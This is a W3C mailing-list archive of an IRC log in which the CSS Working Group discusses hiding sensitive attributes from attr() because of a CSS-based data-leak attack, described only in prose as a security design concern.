- From: CSS Meeting Bot via GitHub <sysbot+gh@w3.org>
- Date: Wed, 24 Jun 2020 17:00:14 +0000
- To: public-css-archive@w3.org
The CSS Working Group just discussed `[selectors][css-values] Hide "sensitive" attributes from CSS`. <details><summary>The full IRC log of that discussion</summary> <dael> Topic: [selectors][css-values] Hide "sensitive" attributes from CSS<br> <dael> github: https://github.com/w3c/csswg-drafts/issues/5136<br> <dael> TabAtkins: Review is this allows for a known attack. Makes it a whole lot easier to do background URLs. rather than partly loading and building letter by letter you can instead grab the whole thing and ship it out.<br> <dael> TabAtkins: Some bits can be crafted with spec language, but some can't. Some attributes will host data and can be extracted. This is a problem<br> <dael> TabAtkins: I'd like to be able to code this attributes. But I don't want to expose arbiterary data attributes with sensitive information.<br> <dael> TabAtkins: Some suggestions in the thread about how to solve. Mark some as safe and unsafe and a mech for JS to swap between categories so you can use some attributes safely.<br> <dael> TabAtkins: I don't know final solution. It's a blocker for attr b/c makes attack easier.<br> <dael> TabAtkins: Anyone interested in security concerns please review and help me figure out a solution that's not cumbersome or weird<br> <dael> astearns: Any initial thoughts?<br> <dael> faceless2_: This is used already in lots of print engines. It would be a shame to break everything by blocking href and other common<br> <dael> TabAtkins: We should set up spec so that UA in secure spaces can ignore this. I'm concerned about thigns like css injection attacks. Print should be fine and will make sure I allow it<br> <dael> astearns: Thanks for intro, we'll get back to this<br> </details> -- GitHub Notification of comment by css-meeting-bot Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5136#issuecomment-648943684 using your GitHub account
Received on Wednesday, 24 June 2020 17:00:16 UTC